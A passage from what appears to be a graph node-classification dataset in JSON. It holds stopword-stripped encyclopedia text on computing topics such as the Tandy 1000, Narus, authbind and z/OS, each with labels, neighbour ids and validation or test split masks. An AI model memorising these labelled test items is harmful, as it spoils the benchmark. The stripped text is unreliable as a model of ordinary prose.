directly pc/xt-compatible keyboard protocol 1000 rsx used pc/at ps/2-compatible protocol tandy 1000 used proprietary 6-pin female round connector joystick port sx/tx adjacent keyboard port front computer keyboard compatible older trs-80 tandy color computer models compatible ibm standard 15-pin male game port dos games work joystick ports support tandy 1000 graphics sound work early tandy 1000 models used non-standard card-edge parallel printer port rather industry standard db-25 printer port required tandy-1000 compatible printer cable connect standard printer parallel port later changed standard db-25 connector 1000 rl tandy 1000tx beyond used proprietary floppy drive cable port also powered floppy drive required tandy 1000 compatible floppy drive though may possible modify floppy drive cable make standard floppy drive work tandy shipped pcs customized version ms-dos compatible tandy graphics keyboard current version ms-dos tandy 1000 dos 3.22 tandy 1000s came shipped one several varieties deskmate gui productivity software suite may compatibility issues later versions dos dos 5 dos 6 1000 rlx tandy 1000s typically limited 640 kb main memory non-tandy versions dos often reduce memory available applications games addition hardware detection routine installer microsoft ms-dos 6 could corrupt serial eeprom tandy 1000 hx machines tandy 1000s could work windows 1.0 2.0 3.0 3.1 exception rlx could run windows 3.1 standard mode rsx fully supported running windows 3.1 386 enhanced mode tandy offered 2 color monitors specific tandy 1000 computers cm-5 0.64 millimeter dot pitch tandy cm-11 dot pitch 0.42 mm 13 inch displays power cable 9 pin rgb cable attach tandy cga port expensive cm-11 also supported special proprietary tandy enhanced 225 scan line text display mode tandy also offered monochrome monitors support mda hercules standard also work tandy 1000 uses cga-compatible interface non-tandy monitors support cga work original tandy 1000 sx ex tx hx used proprietary keyboard keyboard layout compatible pc/xt/at standard use layout keyboard prefigured ibm model keyboard introduced ibm ps/2 series function keys arranged row top instead left pc pc xt/at later models tandy 1000 series 1000 sl tl rl series used keyboard similar compatible ibm ps/2 series keyboard connector layout tandy 1000 used game ports tandy color computer series 26-3025 color mouse 26-3125 deluxe mouse compatible tandy 1000 though dos software drivers written recognize tandy digi-mouse also available required separate controller available either isa plus format systems rs-232c serial ports could use standard serial mice later systems 1000 rl featured ps/2 mouse connector radio shack offered one button joystick worked proprietary 6-pin din joystick connector compatible older trs-80 color computer standard 15-pin ibm pc game ports often found sound cards i/o multifunction isa cards worked many games written take advantage tandy graphics sound radio shack offered tandy 1000 plus 300-baud pc modem compatible 1000ex/hx used plus slots radio shack also offered 2400-baud internal modem third party modems speeds 14k baud work provided 8 bit isa fit radio shack sold tandy dmp-130a dot matrix printers go along tandy 1000 line along compatible card-edged printer cable printer sold home budget prices radio shack often offered package bundle tandy 1000 computer cm-5 budget monitor dmp-130a printer using specially-designed aftermarket cables possible connect non-tandy printers system tandy radio shack wanted compete education school home market dominated apple iie time partnered diamond radio shack sold diamond trackstar 128 series apple iie compatibility board 399 1987 offered free installation tandy 1000 series peripheral similar apple iie card sold later macintosh lc fully functional apple iie clone 128k ram 6502 cpu double high resolution graphics allowed tandy 1000 computers run software written apple iie iic platform especially important consideration education market time also sold retail home users businesses interested ms dos apple ii compatibility board pass rgb cable floppy drive cable required open 10 inch 8-bit isa slot used boot disk boot apple mode boot disk dos apple software could copied compatibility fairly good allowed tandy 1000 owners run apple ii software tandy 1000 machine less cost owning 2 separate machines ibm pc computer apple iie monitor many tandy 1000 sold schools came diamond trackstar 128 installed many home owners also purchased compatibility dos apple ii software original tandy 1000 large computer almost size though plastic case aluminium lower chassis reduce weight came standard one internal 5.25 double-density floppy disk drive additional exposed internal bay usable installation second 5.25 disk drive available kit radio shack floppy drives used jumpers select drive number instead ibm cable twist memory standard computer accepting total memory addition expansion cards ms-dos 2.11 deskmate 1.0 keyboard layout tandy 2000 included computer like pcjr tandy 1000 motherboard supply dma unlike system could dma added memory expansion board tandy 1000 three xt-compatible expansion slots early tandy memory upgrade boards took two slots get slots inches length instead pc 13 inches full-length cards fit reviewers noted many built-in hardware features reduced need cards later revision original tandy 1000 model tandy 1000a revision fixed bugs scanned expansion cards bootable roms added socket math coprocessor original tandy 1000 many models like home computers sold time hard disk drive tandy 1000 hd essentially original tandy 1000 hard disk option factory installed factory hard disk capacity order 10 20 mb tandy 1000 sx tx upgraded versions original tandy 1000 utilizing similar chassis two major upgrades original tandy 1000 inclusion dma controller improved speed diskette operations ibm pc-compatibility systems addition two additional isa expansion slots offer total five 8-bit isa slots tandy 1000 sx used 7.16 mhz 8088-2 processor 384k memory upgradeable 640 kb motherboard came either one two 5.25 internal floppy disk drives light pen port serial port like original tandy 1000 adjustable potentiometer inside system controlled volume internal speaker tandy ax sx rebadged sale walmart stores 1000 sx came ms-dos 3.2 deskmate ii 5.25 360kb diskettes sx first tandy 1000 built-in video circuitry could disabled via dip switch permit installation upgraded graphics card typically ega vga card expansion slot tandy 1000 tx similar 1000 sx detached keyboard unique parallel port edge connector xt-style architecture slightly modified case major difference 80286 cpu clocked 8 mhz similar ibm xt 286 featured 16-bit-wide memory bus although on-board peripherals isa slots 8 bits wide tx 3.5 internal floppy disk drive mounted 5.25 bay room optional second internal 3.5 5.25 floppy disk drive rear panel ports 1000 sx except rs-232c serial port replaced light-pen port memory size 640 kb sockets additional 128 kb devoted onboard video logic extra 128 kb could used on-board video controller impractical expand on-board memory beyond 640 kb vga graphics card installed computer came bundled personal deskmate 2 tandy 1000 ex hx designed entry-level ibm-compatible personal computers marketed starter systems people new computing offered compact all-in-one chassis featured 7.16 mhz 8088 capable clocking 4.77 mhz 256 kb memory expandable 640 kb plus memory expansion board pcjr- cga-compatible tandy video graphics controller keyboard depending model either single 5.25 360 kb floppy drive one two 3.5 720 kb floppy drives external floppy drive could connected port back machine supplied power external drive tandy unit usable ex hx external drive standard 360 kb 5.25 inch format 1988 compatible 720 kb 3.5 inch model offered ex hx upgradable via tandy plus cards systems bays three cards plus card connector electrically identical isa slot connector uses berg-style 62-pin connector instead 62-contact isa card-edge connector plus cards could installed add serial ports 1200-baud modem clock/calendar bus mouse board proprietary tandy network interface radio shack later sold adapter card allowing installation plus card standard isa slot larger tandy 1000 models like original tandy 1000 ex hx built-in dma controller though one added using plus memory expansion board tandy 1000 ex featured 5.25 floppy drive built right-hand side computer casing ex sold us 1,000.00 radio shack december 1986 ex later hx would among popular tandy 1000 line relatively low price useful feature ex later systems ability boot either drive drives could logically swapped system booted drive normally drive b became drive vice versa drives remained swapped system powered reset sx tx capability well 1000 ex came ms-dos 2.11 personal deskmate 5.25 360kb diskettes ms-dos version specialized bootable tandy 1000 included version basica microsoft advanced gw-basic support enhanced cga graphics modes a.k.a tandy graphics tga three-voice sound hardware tandy 1000 tandy 1000 hx updated version ex utilized architecture plus cards ex however one obvious difference offered two 3.5 bays front panel occupied one two 720 kb 3.5 floppy drives opposed single side-mounted 5.25 bay floppy drive ex also tandy ms-dos 2.11r rom could accessed starting computer bootable disk present another improvement ex addition serial eeprom store configuration information enabling similar functionality today cmos nvrams comparison earlier tandy 1000 models like ibm pc pc/xt systems used dip switches jumpers startup configuration settings putting basic elements dos deskmate rom eliminating memory test startup hx booted quickly compared contemporary ms-dos machines despite immediate provisions hard disk drive addition tandy ms-dos 2.11r hx shipped personal deskmate 2 versions ms-dos worked 1000 hx including dos 3.x later versions however quirk dos 4.0 environment prevented version dos working tandy 1000 hx computers additionally installer ms-dos 6 could corrupt contents serial eeprom tandy sl tl series computers updates sx tx respectively addition offering redesigned cases machines offered integrated motherboard improved graphics sound capabilities dropping composite video output graphics controller supported resolution well hercules graphics card-compatible mode monochrome monitors sound capabilities included 8-bit monaural dac/adc similar function parallel port sound devices covox speech thing disney sound source extended support dma transfers microphone input capability sampling rates 48 khz sl/tl lines allowed on-board floppy controller parallel port serial ports disabled earlier models sl tl also shipped ms-dos 3.3 deskmate 3 rom featured serial eeprom memory chip store bios settings machines could also run 'normal ms-dos 3.x 5.x 6.x windows 2.x 3.0 operating systems although windows limited real-mode operations common many pc clones era ms-dos 4 problematic generally avoided tandy 1000 sl sl/2 feature intel 8086 processor running 8 mhz socketed thus upgradeable nec v30 sl came ram preinstalled whereas sl/2 offered machines could expanded although graphics controller reserved portion memory yielding available operating system even systems using add-in isa graphic cards sl line mic/earphone ports volume knob reset button small satellite board jumper board allowed user change microphone input line-level output sl series offered five 8-bit xt-compatible isa slots come pre-installed real-time clock chips making optional upgrades form plug-in dallas ds1216e smartwatch sl machine line offers upper 5.25 bay therefore model offer two 5.25 bays models including sl/2 entire tl range feature two upper 3.5 bays one lower 5.25 bay result fitting hard drive sl already upper lower 5.25 bays populated may require either removal one devices bays installation hard disk card-style bracket seats one isa slots tandy 1000 tl tl/2 used 8 mhz intel 80286 processors whereas tl/3 used 10 mhz 80286 socketed thus upgradable 386sx 486sx replacements though functionality far true 386/486 cores due lack extended memory boards xt-type expansion slots tls 640 kb memory preinstalled option extra 128 kb video frame buffering 1000 tx unlike sl series machines tl machines came smartwatch real-time clock logic built-in powered removable 3-volt cr2032 button-cell battery motherboard tl offered five 8-bit xt-compatible isa slots tl/2 tl/3 offered four slots on-board 8-bit xt ide-compatible hard disk interface compatible standard ide hard drives tl series offered two upper 3.5 bays one lower 5.25 bay tl/3 also offered high-density floppy drive controller 1.44 mb drives though shipped double-density 3.5 720 kb drive tandy 1000 rl/rlx/rsx series slim-line desktop home computers featured much compact case least 512 kb memory pre-installed smaller ps/2-style keyboard mouse ports least one isa expansion slot rl-series rsx include provisions internal hard disk drive depending model rl-series featured built-in xt-ide hard drive interface rsx featured at-compatible ide interface keyboard connectors rl-series similar mechanically compatible ps/2-style connectors fully compatible typical ps/2 keyboards keyboard uses xt keyboard protocol rsx however incorporated keyboard protocol making first 1000-series system offer complete compatibility typical ps/2 keyboards keyboards using adapter rl rl/hd featured surface-mounted 8086 processor 512 kb ram expandable 768 kb provide 128 kb video 640 kb conventional memory db-25 unidirectional parallel port instead edge-connector ports sl enhanced graphics sound single half-size 8-bit expansion slot available rl/hd battery-backed real-time clock chip store date time information rl lacked models also ms-dos portion deskmate rom could therefore boot much faster many computers market rl/hd came 20mb drive preinstalled rlx 'mid-range offering rl line 10 mhz 286 surface-mounted 512 kb ram unlike 286-based tandy 1000 models supported 384 kb extended memory ram expanded maximum 1 mb however full at-class machine still 8-bit isa bus rl one half-size expansion slot 8 irqs 4 dma channels three-voice sound chip dac still present tandy video dropped favor acumos vga controller offering 256 kb video memory maximum 640x480x16 320x480x256 graphics resolution parallel port bidirectional first tandy 1000 series rlx one 1.44 mb 3.5 floppy drive empty drive bay could host second drive hard disk rlx/hd came 20 mb hard disk 1 mb ram preinstalled hard disk occupied empty drive bay version supported single floppy drive upscale offering rsx offered 25 mhz 80386sx processor 1 mb ram two 16-bit isa slots acumos svga video bidirectional parallel port standard ps/2 keyboard mouse ports full 386-class pc could run microsoft windows 3.x two sockets simm memory cards provided 1 mb 4 mb simms 9-chip type supported two installed like capacity two 4 mb simms installed 1000 rsx could expanded 9 mb ram without using isa slot rsx/hd variant came 52 mb hard drive using at-compatible ide interface replacement hard drives 504 mb could substituted slimline case one hard drive could installed alongside 1.44 mb 3.5 floppy drive motherboard socket 80387sx math coprocessor rsx still retained tandy 1000 3-voice sound hardware dac though i/o address 3-voice sound chip moved rendering many games previously compatible unable play music unless modified dac could used emulate covox speech thing via ms-dos device drivers limited sound support worked game chuck yeager air combat windows 3.xx sound device drivers available worked windows 95 full 9mb ram tandy 1000 rsx acumos vga graphics could software-updated cirrus logic bios via ms-dos driver allow vesa/svga function windows 95 windows 3.xx tandy vga drivers insufficient windows 95 major software publishers makers game educational software sierra broderbund offered software titles specifically supported tandy unique proprietary 16-color graphics 3-voice sound tandy specific hardware features enhancements offer superior graphics sound experience tandy 1000 owners standard dos titles software supported tandy graphics typically labelled package tandy 1000/pcjr compatible many tandy 1000 enhanced games featured youtube although tandy 1000 run dos software programs known specifically support tandy 1000 enhanced features programs require dos run tandy shipped version dos tandy used main memory graphics result programs require 640k 768k run enhanced graphics sound often tax processor 80286 processor faster recommended best results also games educational software supports second generation tandy 1000 graphics sound offers 640 200 16 colors 8-bit dacs found 1000 sl/tl series examples software includes mario typing tutor star trek freddy pharkas frontier pharmacist sargon chess",
    "neighbors": [
      2179,
      6660,
      8707,
      780,
      1679,
      9363,
      919,
      5400,
      9501,
      4642,
      3623,
      10424,
      4674,
      10692,
      5702,
      9166,
      4690,
      5340,
      2525,
      8287,
      9703,
      1515,
      8300,
      1776,
      6129,
      8049,
      6390,
      5368,
      3323
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2160,
    "label": 7,
    "text": "Mobile_agent:mobile agent computer science mobile agent composition computer software data able migrate move one computer another autonomously continue execution destination computer reality mobile agent code/object move travels itinerary within network connected nodes mobile agent namely type software agent feature autonomy social ability learning significantly mobility specifically mobile agent process transport state one environment another data intact capable performing appropriately new environment mobile agents decide move movement often evolved rpc methods user directs internet browser visit website browser merely downloads copy site one version case dynamic web sites similarly mobile agent accomplishes move data duplication mobile agent decides move saves state process image transports saved state new host resumes execution saved state mobile agent specific form mobile code within field code mobility however contrast remote evaluation code demand programming paradigms mobile agents active choose migrate computers time execution makes powerful tool implementing distributed applications computer network two types mobile agent classification based migration path 1 mobile agents predefined path static migration path 2 free roaming mobile agent dynamic migration path depending present network condition mobile agent chooses path open multi-agent systems mas system agents owned variety stakeholders continuously enter leave system early 1990s general magic created telescript language environment writing executing mobile agents described now-popular cloud metaphor described andy hertzfeld company unsuccessful however advantages mobile agents conventional agents one particular advantage remote deployment software includes increased portability thereby making system requirements less influential",
    "neighbors": [
      9441,
      4194,
      4423,
      7727,
      9778,
      7189
    ],
    "mask": "Test"
  },
  {
    "node_id": 2161,
    "label": 3,
    "text": "AT_(form_factor):form factor era ibm compatible personal computers form factor referred dimensions layout form factor motherboard ibm like ibm pc ibm xt models many third-party manufacturers produced motherboards compatible ibm form factor allowing end users upgrade computers faster processors ibm became widely copied design booming home computer market 1980s ibm clones made time began using compatible designs contributing popularity 1990s many computers still used variants since 1997 form factor largely supplanted atx original motherboard later known full means fit mini desktop minitower cases board size also means takes space behind drive bays making installation new drives difficult ibm original heavy-gauge steel case two 5-1/4 full-height drive bays overhang front motherboard precisely left bay overhangs motherboard right bay subdivided two half-height bays additionally extends downward toward bottom chassis allowing second full-height fixed disk installed single half-height drive power connectors motherboards two nearly identical 6-pin plugs sockets designed ibm connectors mechanically keyed inserted correct position clone manufacturers cut costs used unkeyed interchangeable connectors unfortunately two power connectors requires easily distinguishable leading many people damage boards improperly connected plugged two black wires connector must adjacent making row 4 consecutive black wires total 12 technicians developed mnemonic devices help assure proper installation including black wires together middle red red dead 1985 ibm introduced baby soon computer makers abandoned cheaper smaller baby form factor using computers spanned several generations used 286 processors p5 pentium limited number pentium ii systems motherboards similar mounting hole positions eight card slot locations form factor narrower marginally shorter size flexibility kind motherboard key success format development bigger cpu coolers—and fact blocked full-length pci isa cards—spelled end baby main impetus successor atx standard considered mostly obsolete industrial computers still use 1995 intel introduced atx form factor gradually replaced older baby motherboards late 1990s great majority boards either baby atx many motherboard manufacturers favored baby atx many computer cases power supplies industry still designed boards atx boards also lack eighth slot atx motherboards kept used servers industry shifted atx motherboard configurations became common design cases power supplies support baby atx motherboards connector board two molex 15-48-0106 connectors mates molex 90331",
    "neighbors": [
      10337,
      2500,
      455,
      7113,
      9307,
      8301,
      7151,
      10095,
      6129,
      2803,
      8851,
      10715,
      5368,
      8730,
      3323,
      3037
    ],
    "mask": "None"
  },
  {
    "node_id": 2162,
    "label": 4,
    "text": "Narus_(company):narus company narus inc. software company vendor big data analytics cybersecurity 1997 ori cohen vice president business technology development vdonet founded narus stas khirman israel presently employed deutsche telekom ag members narus executive team 2010 narus became subsidiary boeing located sunnyvale california 2015 narus sold symantec 2004 narus employed former deputy director national security agency william crowell director press release announcing narus one first companies combine patented machine learning algorithms automation data fusion technologies provide incisive intelligence context control network operators need protect cyberthreats ensure information security narus software primarily captures various computer network traffic real time analyzes results prior 9/11 narus built carrier-grade tools analyze ip network traffic billing purposes prevent narus called revenue leakage post-9/11 narus added semantic monitoring abilities surveillance narus noted created narusinsight supercomputer system whose installation san francisco internet backbone gave rise 2006 class action lawsuit electronic frontier foundation hepting v. features narusinsight include intercepted data flows narusinsight intercept suite data stored analyzed surveillance forensic analysis capabilities include playback streaming media i.e. voip rendering web pages examination e-mail ability analyze payload/attachments e-mail file transfer protocols narus partner products pen-link offer ability quickly analyze information collected directed analysis lawful intercept modules single narusinsight machine monitor traffic equal maximum capacity 10 gbit/s around 39,000 256k dsl lines 195,000 56k telephone modems practical terms since individual internet connections continually filled capacity 10 gbit/s capacity one narusinsight installation enables monitor combined traffic several million broadband users according year 2007 company press release latest version narusinsight intercept suite nis industry network traffic intelligence system supports real-time precision targeting capturing reconstruction webmail traffic ... including google gmail msn hotmail yahoo mail however currently webmail traffic https encrypted content messages monitored consent service providers narusinsight also perform semantic analysis traffic happening words analyze content meaning structure significance traffic real time exact use data fully documented public authorized see types activities ideas monitored ed snowden june 2013 releases prism surveillance program made clear however narus played central role narus provided telecom egypt deep packet inspection equipment content-filtering technology allows network managers inspect track target content users internet mobile phones passes routers national telecommunications authorities pakistan saudi arabia global narus customers narus supplied software hardware used wiretapping rooms according whistleblowers thomas drake mark klein",
    "neighbors": [
      9569,
      1480,
      6344,
      266,
      7887,
      9233,
      10417,
      10935,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 2163,
    "label": 7,
    "text": "Apache_Impala:apache impala apache impala open source massively parallel processing mpp sql query engine data stored computer cluster running apache hadoop impala described open-source equivalent google f1 inspired development 2012 apache impala query engine runs apache hadoop project announced october 2012 public beta test distribution became generally available may 2013 impala brings scalable parallel database technology hadoop enabling users issue low-latency sql queries data stored hdfs apache hbase without requiring data movement transformation impala integrated hadoop use file data formats metadata security resource management frameworks used mapreduce apache hive apache pig hadoop software impala promoted analysts data scientists perform analytics data stored hadoop via sql business intelligence tools result large-scale data processing via mapreduce interactive queries done system using data metadata – removing need migrate data sets specialized systems and/or proprietary formats simply perform analysis features include early 2013 column-oriented file format called parquet announced architectures including impala december 2013 amazon web services announced support impala early 2014 mapr added support impala 2015 another format called kudu announced cloudera proposed donate apache software foundation along impala impala graduated apache top-level project tlp 28 november 2017",
    "neighbors": [
      9344,
      10377,
      8460,
      7567,
      1296,
      6161,
      1047,
      8217,
      11161,
      6555,
      8860,
      6943,
      7841,
      3877,
      10661,
      11303,
      5677,
      10413,
      1327,
      7983,
      4919,
      5047,
      4538,
      1851,
      6074,
      7485,
      7742,
      9789,
      7233,
      6338,
      4419,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      11343,
      4944,
      7248,
      6098,
      1363,
      7767,
      8408,
      9179,
      7261,
      990,
      8799,
      10719,
      865,
      11235,
      8294,
      11111,
      8425,
      8810,
      747,
      5612,
      6774,
      7159,
      1913,
      1018
    ],
    "mask": "Test"
  },
  {
    "node_id": 2164,
    "label": 4,
    "text": "Authbind:authbind authbind open-source system utility written ian jackson distributed gnu general public license authbind software allows program would normally require superuser privileges access privileged network services run non-privileged user authbind allows system administrator permit specific users groups access bind tcp udp ports 1024 ports 0 1023 normally privileged reserved programs run root user allowing regular users limited access privileged ports helps prevent possible privilege escalation system compromise software happens contain software bugs found vulnerable unknown exploits authbind achieves defining ld_preload environment variable loads libauthbind library library overrides bind call version executes setuid helper program /usr/lib/authbind/helper socket file descriptor 0 helper validates arguments checks configuration calls real bind system call file descriptor 0 also affects original process socket exits allowing original process continue socket bound requested address port authbind currently distributed debian ubuntu linux distributions",
    "neighbors": [
      7804,
      10176,
      5636,
      7206,
      4956,
      5612,
      5805,
      10924,
      7983,
      3473,
      5397,
      11413,
      700,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2165,
    "label": 3,
    "text": "ThinkPad_T_series:thinkpad series thinkpad series line laptop computers introduced ibm 2000 transfer consumer computer division 2005 developed marketed chinese technology company lenovo ibm introduced series part thinkpad brand 2000 laptop meant cater users working multiple networks different environments resulted development ibm embedded security subsystem time inception series designed balance speed mobility despite 14.1 ” screen similar desktops time titanium composite body laptop designed keep weight low possible users also given options swap components mobility like dvd player writeable cd drive numeric keypads thinkpad t20 released ibm successor thinkpad 600 laptops despite weight t20 screen making lightest laptop offering screen size addition internal 8x dvd-rom drive weight remained low october 2000 thinkpad t20 upgraded released thinkpad t21 laptop intel mobile pentium iii 800 mhz cpu 14.1 ” lcd display offered higher resolution hard disk space offered 32gbhigh time minor refinements made t2x series resulting t22 finally 2002 t23 pentium iii-m 1.13 ghz tualatin 128mb ram 30gb hard drive thinkpad t30 released may 2002 options intel mobile pentium 4-m processor intel 845mp mobile chipset additional options included ati mobility radeon 7500 video controller 16 mb graphics memory 14.1 ” lcd display resolution 1 gb pc2100 ram complemented 60 gb hard drive dvd-rom/cd-rw combo drive making powerful laptop.announced march 2003 thinkpad t40p represented first series performance class laptops thinkpad t40p offered ati mobility 9000 64 mb vram 14.1 ” lcd display resolution maximum 2 gb pc2100 ram 60 gb ide hard disk design followed t41 t41p t42 t42p ati mobility 7500 9600 firegl t2 almost complete parts interchangeability except fan normal p-series keyboard 14.1 15 screen 14.1 15 screen inverter 15 t42 t42p models offered optional flexview ips lcd display launched april 2005 thinkpad t43 t43p laptops last t-series laptops manufactured ibm major improvement move lower-cost ddr2 ram bus speed increase 400 mhz 533 mhz cpu also first xd bit making first thinkpad could run windows 8.x windows 10 december 2004 lenovo china announced acquisition ibm pc division including thinkpad brand time 40 pc division working china thinkpads made lenovo arch-rival great wall technology lenovo released thinkpad t60 t60p laptops february 2006 designed manufactured lenovo t60 t60p still featured ibm logo machines may 2007 t61 t61p laptops slowly phased ibm logos favor thinkpad logo also first series notebook adopt widescreen resolution mainstream option traditional 4:3 aspect ratio screens also offered alternative time mass industry adoption widescreen standard meant last thinkpad kind use 4:3 standard naming convention series changed lenovo following release thinkpad t400 t500 july 2008 txxp models like t61p replaced lenovo ’ thinkpad w series laptops designed mobile workstations w series grew become lenovo ’ line performance-oriented laptops series remains lenovo ’ premier line laptops aimed corporate enterprise users praised users outstanding linux compatibility t-p lineup later returned t440p t460p t470p t540p ultimately canceled -80 generation battery configuration processor weight screen resolution graphics laptop storage combinations excluding wwan slot laptop memory recent 14 models recent 15 models available lenovo pcworld said thinkpad t20 “ packs bigger screen comfortable keyboard larger set useful features smaller package competitors. ” web site epinions.com said thinkpad t20 “ worth wait ” giving 4.5 stars 5 review thinkpad t60 notebook review called t-series laptops “ flagship thinkpad brand ” aimed corporate professionals t-series characteristics listed notebookreview.com include durability security usability performance thinkpad t410 awarded 4.5 5 stars notebook review upon release review noted centering screen eliminating thick bezel one side thin bezel review indicated pros speed battery life wide selection ports cons minor distortions screen flexed high pitched fan wired also reviewed t410 laptop positively saying “ lenovo ’ thoughtful thinkpad near-perfect machine ” pc advisor review thinkpad t510 called lack alterations traditional design good thing also highlighted professional appearance ‘ sturdy build quality ’ indicating makes laptop stand others market t420 t520 laptops different predecessors mainly upgrade intel ’ sandy bridge processors t420 received total score 85 notebook check web site fan noise noticeably reduced indicated reviewer pcworld t-series laptops t420 t420s t520 lauded battery life – 30 hours 9-cell battery slice",
    "neighbors": [
      1186,
      4259,
      5606,
      3304,
      5481,
      5386,
      271,
      5073,
      823,
      3514,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 2166,
    "label": 2,
    "text": "Multics_Emacs:multics emacs multics emacs early implementation emacs text editor written maclisp bernard greenberg honeywell cambridge information systems lab user-supplied extensions also written lisp programming language choice 1978 lisp provided extensibility ever followed subsequent emacs implementations",
    "neighbors": [
      4097,
      8993,
      11495,
      8778,
      5361,
      3675,
      5694
    ],
    "mask": "None"
  },
  {
    "node_id": 2167,
    "label": 0,
    "text": "Augmented_transition_network:augmented transition network augmented transition network atn type graph theoretic structure used operational definition formal languages used especially parsing relatively complex natural languages wide application artificial intelligence atn theoretically analyze structure sentence however complicated atn modified transition networks extension rtns atns build idea using finite state machines markov model parse sentences w. woods transition network grammars natural language analysis claims adding recursive mechanism finite state model parsing achieved much efficiently instead building automaton particular sentence collection transition graphs built grammatically correct sentence parsed reaching final state state graph transitions graphs simply subroutine calls one state initial state graph network sentence determined grammatically correct final state reached last word sentence model meets many goals set forth nature language captures regularities language process operates number environments grammar encapsulate process single structure encapsulation simplifies grammar added bonus efficiency operation another advantage model ability postpone decisions many grammars use guessing ambiguity comes means enough yet known sentence use recursion atns solve inefficiency postponing decisions known sentence",
    "neighbors": [
      4028,
      5399
    ],
    "mask": "None"
  },
  {
    "node_id": 2168,
    "label": 2,
    "text": "Z/OS:z/os z/os 64-bit operating system ibm mainframes produced ibm derives successor os/390 turn followed string mvs versions like os/390 z/os combines number formerly separate related products still optional z/os offers attributes modern operating systems also retains much functionality originating 1960s subsequent decade still found daily use backward compatibility one z/os central design philosophies z/os first introduced october 2000. z/os supports stable mainframe systems standards cics cobol ims db2 racf sna ibm mq record-oriented data access methods rexx clist smp/e jcl tso/e ispf among others however z/os also supports 64-bit java c c++ unix single unix specification apis applications unix system services – open group certifies z/os compliant unix operating system – unix/linux-style hierarchical hfs zfs file systems result z/os hosts broad range commercial open source software z/os communicate directly via tcp/ip including ipv6 includes standard http servers one lotus apache-derived along common services ftp nfs cifs/smb another central design philosophy support extremely high quality service qos even within single operating system instance although z/os built-in support parallel sysplex clustering z/os workload manager wlm dispatcher automatically manages numerous concurrently hosted units work running separate key-protected address spaces according dynamically adjustable goals capability inherently supports multi-tenancy within single operating system image however modern ibm mainframes also offer two additional levels virtualization lpars optionally z/vm new functions within hardware z/os z/vm — linux opensolaris support — encouraged development new applications mainframes many utilize websphere application server z/os middleware inception z/os supported tri-modal addressing 24-bit 31-bit 64-bit version 1.5 z/os could start either 31-bit esa/390 64-bit z/architecture mode could function older hardware albeit without 64-bit application support machines newer z/architecture hardware manufactured starting year 2000 run 64-bit code ibm support z/os 1.5 ended march 31 2007 z/os supported z/architecture mainframes runs 64-bit mode application programmers still use addressing mode applications regardless addressing mode coexist without modification ibm maintains commitment tri-modal backward compatibility however increasing numbers middleware products applications db2 version 8 require exploit 64-bit addressing ibm markets z/os flagship operating system suited continuous high-volume operation high security stability z/os available standard license pricing well via ibm z new application license charges znalc ibm z solution edition two lower priced offerings aimed supporting newer applications new workloads u.s. standard commercial z/os pricing starts 125 per month including support smallest znalc installation running base z/os product plus typical set optional z/os features z/os introduced variable workload license charges vwlc entry workload license charges ewlc sub-capacity billing options vwlc ewlc customers pay peak monthly z/os usage full machine capacity previous os/390 operating system vwlc ewlc also available ibm software products running z/os peaks separately calculated never exceed z/os peak eligible sub-capacity licensing z/os customer must running 64-bit mode requires z/architecture hardware must completely eliminated os/390 system must e-mail ibm monthly sub-capacity reports sub-capacity billing substantially reduces software charges ibm mainframe customers advanced workload license charges awlc successor vwlc mainframe models starting zenterprise 196 eawlc option zenterprise 114 models awlc eawlc offer sub-capacity discounts within address space z/os typically permits placement data code 2 gb bar z/os enforces distinction primarily performance reasons architectural impediments allowing 2 gb application code per address space ibm started allow java code running z/os execute 2 gb bar performance reasons starting z/os version 2 release 3 code may placed executed 2 gb bar however z/os services may invoked bar memory obtained large memory objects multiples 1 mb expectation applications middleware manage memory allocation within large pieces three types large memory objects generation data group gdg special type file used ibm mainframe operating system z/os actual gdg description many generations file kept old oldest generation must least deleted whenever new generation created system checks whether one obsolete generations deleted necessary deletes purpose gdgs automate archival using command language jcl file name given generic dsn appears gdg name appears along history number 0 recent version -1 -2 ... previous generations another use gdgs able address generations simultaneously within jcl script without know number currently available generations omit parentheses generation number jcl specifying dataset creation standard gdg five safety scopes least 35 days old delete standard gdg ibm supports z/os release coexistence fallback n+2 basis example ibm customers running release 9 upgrade directly release 11 release 10 releases operate concurrently within sysplex cluster without conflict using datasets configurations security profiles etc coexistence long so-called toleration maintenance installed older release problem release 11 customer return release 9 without experiencing dataset configuration security profile compatibility problems fallback ready try moving forward z/os customers using parallel sysplex clustering operate n+2 releases e.g release 9 release 11 release 9 release 10 mixed release configurations production long required complete release upgrades supported release mixing within cluster one key strategies z/os avoiding service outages ibm standard support period z/os release three years z/os customers take advantage n+2 support model skip every release thus z/os customers either odd even ibm releases individual small enhancements corrections a.k.a ptfs z/os needed needed ibm labels critical ptfs hiper high impact pervasive ibm also rolls multiple patches recommended service update rsu rsus released periodically range every one three months undergo additional testing although z/os customers vary maintenance practices ibm encourages every z/os customer adopt reasonable preventive maintenance strategy avoid known problems might occur version 2 release 2 available version 2 release 3 available",
    "neighbors": [
      2560,
      10752,
      6148,
      6664,
      6155,
      6675,
      7187,
      8213,
      4630,
      6678,
      10776,
      25,
      4637,
      3615,
      8737,
      7202,
      4643,
      6180,
      4645,
      9762,
      10273,
      5677,
      8751,
      7217,
      10803,
      7733,
      2616,
      10809,
      573,
      576,
      2625,
      8262,
      7242,
      6221,
      11344,
      3667,
      9814,
      3160,
      2138,
      8283,
      2652,
      10333,
      97,
      6242,
      8290,
      5220,
      9829,
      11363,
      6248,
      6760,
      10856,
      9835,
      9838,
      7285,
      4727,
      9335,
      634,
      1147,
      2172,
      3197,
      1150,
      5247,
      7292,
      7293,
      11390,
      2179,
      10883,
      3720,
      10891,
      6797,
      10382,
      7312,
      9361,
      10900,
      10389,
      2710,
      6296,
      2201,
      9370,
      9882,
      7836,
      11416,
      4255,
      9887,
      4775,
      7848,
      8872,
      6828,
      5293,
      8879,
      178,
      9907,
      6325,
      6837,
      6329,
      8889,
      3771,
      5819,
      190,
      5823,
      6850,
      1219,
      7364,
      8388,
      6342,
      10438,
      1736,
      2248,
      8911,
      5840,
      10962,
      1235,
      7382,
      6361,
      8410,
      9436,
      1247,
      225,
      11489,
      741,
      231,
      3816,
      7403,
      242,
      5363,
      9977,
      7930,
      3323,
      9466,
      2813,
      1278,
      9468,
      3841,
      5378,
      8966,
      1804,
      10508,
      8975,
      9487,
      273,
      8977,
      787,
      788,
      789,
      1813,
      5397,
      11024,
      11539,
      284,
      8476,
      3359,
